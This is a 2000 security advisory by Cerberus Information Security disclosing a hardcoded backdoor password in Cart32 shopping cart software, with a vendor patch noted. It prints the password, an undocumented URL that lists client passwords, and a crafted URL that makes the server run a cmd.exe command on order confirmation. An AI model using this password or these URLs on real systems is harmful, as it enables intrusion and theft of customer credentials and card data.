Backdoor in Cart32 Software

Backdoor in Cart32 Software
Reported April 27, 2000 by Cerberus Information Security

VERSIONS EFFECTED

Cart32 v2.6 and 3.0 -- Web-based shopping cart software

DESCRIPTION

The Cerberus Security Team has discovered a backdoor in McMurtrey/Whitaker & Associates, Inc"s Cart32 software.The backdoor can be used to gain access to sensitive information such as passwords and credit card information. In addition, arbitrary commands may be run on a remote server, and the administratrive password may be changed without knowledge of the current administrative password.

Within cart32.exe there is a secret backdoor password of "wemilo" that can be found at file offset 0x6204h. The password is known internally to the software as the Cart32Password.

DEMONSTRATION

With knowledge of this password an attacker can go to one of several undocument URLs such
as http://abc123/scripts/cart32.exe/cart32clientlist and obtain a list the passwords for each Cart32 shopping site on the server.A specially crafted URL could allow an attacker to configure the server so that it runs commands when an order is confirmed. For example, the following URL would set the cart"s properties to spawn a shell, perform a directory listing and pipe the output to a file called file.txt on the root of the C: drive when an order is confirmed.

http://abc123/scripts/c32web.exe?TabName=Cart32%2B
&Action=Save+Cart32%2B+Tab&SaveTab=Cart32%2B&Client=\[client\]
&ClientPassword=\[password\]&Admin=&AdminPassword=&TabToSave=Cart32%2B
&PlusTabToSave=Run+External+Program&UseCMDLine=Yes
&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt

VENDOR RESPONSE

The vendor issued a patch to remove the backdoors.
http://www.cart32.com/update

CREDITS
Discovered and reported by Cerberus Information Security

Comments

Plain text